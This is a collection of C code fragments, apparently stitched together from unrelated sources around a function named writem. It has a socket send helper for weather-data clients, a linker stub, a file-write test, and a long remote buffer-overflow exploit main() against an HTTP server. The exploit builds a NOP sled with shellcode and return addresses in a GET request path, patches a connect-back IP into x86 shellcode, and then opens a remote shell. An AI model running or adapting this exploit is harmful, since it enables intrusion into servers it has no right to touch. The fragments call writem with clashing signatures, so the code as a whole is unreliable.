int send_emwin_packet(int fd, struct emwin_packet_st *ep,
int timeout_ms, int retry){
/*
* fd is the client socket.
*
* Returns:
* -1 => write error
* 0 => no errors
* 1 => could not write all (timed out).
*/
int status = 0;
ssize_t n = 0;
n = writem(fd, ep->packet, ep->packet_size,
(unsigned int)timeout_ms, retry);
if(n == -1)
status = -1;
else if(n != ep->packet_size)
status = 1;
/*
* debug: log_info("f:%d", status);
*/
return(status);
}
void
linkem(void)
{
if (!readem())
return;
relocatem();
valuem();
pokem();
writem();
}
static int send_nbs2_client(struct conn_element_st *ce,
void *packet, uint32_t packet_size){
int status = 0;
int fd;
char *nameorip;
int timeout_ms;
int retry;
ssize_t n = 0;
fd = conn_element_get_fd(ce);
nameorip = conn_element_get_nameorip(ce);
timeout_ms = conn_element_get_write_timeout_ms(ce);
retry = conn_element_get_write_timeout_retry(ce);
n = writem(fd, packet, (size_t)packet_size, (unsigned int)timeout_ms, retry);
if(n == -1){
status = -1;
log_err2("Cannot transmit to client", nameorip);
} else if((size_t)n != packet_size) {
/*
* timed out (including partial read)
*/
status = 1;
log_errx("Cannot transmit to client %s. Timed out %d ms.",
nameorip, timeout_ms);
} else
status = 0;
if(status != 0){
/*
* Set the connection_status flag to make the main thread
* (process_dirty_connections() in serverm.c) to
* close the connection and let the the client to try to restore
* it since there is no other way to resynchronize the server and client.
* If there is an error (mutex) trying to raise the flag, then
* we try to exit the client thread entirely.
*/
conn_element_set_fd(ce, -1);
if(conn_element_set_connection_status(ce, -1) != 0)
conn_element_set_exit_flag(ce);
} else
conn_stats_update_packets(&ce->cs, (size_t)packet_size);
if((status == 0) && (g.f_debug != 0))
log_msg(LOG_DEBUG, "Transmit OK to client %s", nameorip);
return(status);
}
/* Simple test of writem()
* Checks that file is written
*/
int testWRITEM(int *m, int n, char *fname) {
int i, j, read;
writem(m, n, fname);
FILE *dst = fopen(fname, "r");
for (i = 0; i < 25; i++) {
read = fscanf(dst, "%d", &j);
if (!read) {
return 1;
}
}
fclose(dst);
return 0;
}
int main(int argc, char **argv, char **env) {
if(argc<=1) usage(argv[0]); fputc('\n', stderr);
while((ch=getopt(argc,argv,"t:s:p:a:l:i:r:xeb:vh"))!=EOF)
switch (ch) {
case 't': {
i = atoi(optarg);
if(!i)
list_targets(),
exit(0);
else
i--;
target = tlist[i].type;
addr = tlist[i].ret_addr;
bsize = tlist[i].bsize;
retfill = tlist[i].retfill;
if(strstr(tlist[i].type, "1.3")) ver=3;
if(strstr(tlist[i].type, "1.4")) ver=4;
} break;
case 's': {
i = atoi(optarg);
shelltype = slist[i].shelltype;
shellcode = slist[i].shellcode;
shellport = slist[i].shellport;
backport = slist[i].backport;
} break;
case 'p': strncpy(path, optarg, sizeof(path)); break;
case 'a': addr = strtoul(optarg, NULL, 0); break;
case 'l': rlen = atoi(optarg); break;
case 'i': bsize = atoi(optarg); break;
case 'r': retfill = atoi(optarg); break;
case 'v': verbose++; break;
case 'x': test_shellcode(); break;
case 'e': exploit++; break;
case 'b': {
strncpy(cmd, optarg, sizeof(cmd));
for(i = 0; i < strlen(cmd); i++)
if(cmd[i] == '.') cmd[i] = ' ';
sscanf(cmd, "%d %d %d %d", &a, &b, &c, &d);
if(!a||!b||!c||!d)
log("0 in the ip. pls use another\n"),
exit(0);
if(!shellcode)
log("use -s option before -b\n"),
exit(0);
if(shellcode==x86_bsd_connback)
shellcode[24] = (char ) a,
shellcode[25] = (char ) b,
shellcode[26] = (char ) c,
shellcode[27] = (char ) d,
memcpy(&back, shellcode+24, 4);
if(shellcode==x86_linux_connback)
shellcode[12+33] = (char ) a,
shellcode[12+34] = (char ) b,
shellcode[12+35] = (char ) c,
shellcode[12+36] = (char ) d,
memcpy(&back, shellcode+12+33, 4);
} break;
case 'h': default: usage(argv[0]); break;
}
dest=argv[argc - 1];
ptr=strchr(dest,':'); if(ptr!=NULL) { ptr[0]='\0'; ptr++; port=atoi(ptr);}
log("start attack: (1.%d) %s\n\n", ver, target);
log("connecting to %s %d ... ", dest, port);
if(connectm(dest, port, &t)) exit(0);
log("building query ...\n");
if(ver>3) {
sprintf(cmd, "Host: %s\n", dest);
target=strdup(cmd);
} else
target=strdup("");
sprintf(cmd,
"GET %s HTTP/1.0\n"
"%s"
"Accept: text/html, text/plain\n"
"Accept: application/postscript, text/sgml, */*;q=0.01\n"
"Accept-Encoding: gzip, compress\n"
"Accept-Language: en\n"
"Negotiate: trans\n"
"User-Agent: Lynx/6.6.6\n"
"\n", path, target);
log("sending query (%d) ... ", strlen(cmd));
if(verbose) log("send>\n%s\n<send\n", cmd);
writem(); perror(NULL);
log("receiving data ...\n");
recvall(rlen);
close(t);
if(srvok)
exit(0);
if(!m302ok)
log("url path not redirected. use -p to override\n"),
exit(0);
if(!rlen)
log("rlen auto detection fail. use -l to override\n"),
exit(0);
if(rlen % 2)
log("alignment error (rlen: %d). not exploitable.\n", rlen),
exit(0);
log("addr: 0x%x\n", (unsigned int) addr);
log("rlen: %d\n", rlen);
log("offset: %d\n", offset);
addr += rlen + offset;
log("use addr: 0x%x (addr + rlen + offset)\n", (unsigned int) addr);
bsize-=rlen;
bsize-=retfill;
bsize/=2;
log("buffer size: %d ((bsize-rlen-retfill)/2)\n", bsize);
log("retfill: %d\n", retfill);
log("shellcode len: %d\n\n", strlen(shellcode));
if(!exploit)
log("all seems ok. run again with -e option\n"),
exit(0);
if(backport) {
if(!back)
log("no connect back ip. use -b option\n"),
exit(0);
log("connect back to: 0x%08x %d\n", (unsigned long) back, backport);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
s.sin_family = AF_INET;
s.sin_port = htons(backport);
s.sin_addr.s_addr = htonl(INADDR_ANY);
debug("... bind", bind(sock, (struct sockaddr *)&s, sizeof(s)));
debug("... listen", listen(sock, 5));
}
starttime = time(NULL); setjmp(w);
log("ready in %d sec...\r", starttime + TIMEOUT - time(NULL));
if(starttime + TIMEOUT >= time(NULL)) longjmp(w, 1);
log("connecting to %s %d ... ", dest, port);
if(connectm(dest, port, &t)) exit(0);
log("building data ...\n");
buff = (char *)malloc(bsize+retfill*4+100);
memset(buff, 0x00, bsize+retfill*4+100);
for(i=0; i<bsize; i++) buff[i] = 0x90;
ptr=buff+((bsize)-(strlen(shellcode)));
for(i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i];
addr_ptr = (long *)ptr;
for(i=0; i<retfill; i+=4) *(addr_ptr++)=addr;
log("building query + data ...\n");
sprintf(cmd,
"GET %s%s HTTP/1.0\n"
"%s"
"Accept: text/html, text/plain\n"
"Accept: application/postscript, text/sgml, */*;q=0.01\n"
"Accept-Encoding: gzip, compress\n"
"Accept-Language: en\n"
"Negotiate: trans\n"
"User-Agent: Lynx/6.6.6\n"
"\n", path, buff, target);
log("sending query + data (all: %d) (buff: %d) ... ",
strlen(cmd), strlen(buff));
if(verbose) log("send>\n%s\n<send\n", cmd);
writem(); perror(NULL);
log("shell ...\n");
if(shellport) {
log("connecting to %s %d ... ", dest, shellport);
sleep(1); if(connectm(dest, shellport, &sock)) exit(0);
}
if(backport) {
debug("... accept", sock = accept(sock, (struct sockaddr *)&s, &l));
}
signal(2, sigh);
shell();
CLOSE(t);
CLOSE(sock);
FREE(target);
log("done.\n");
return 0;
}
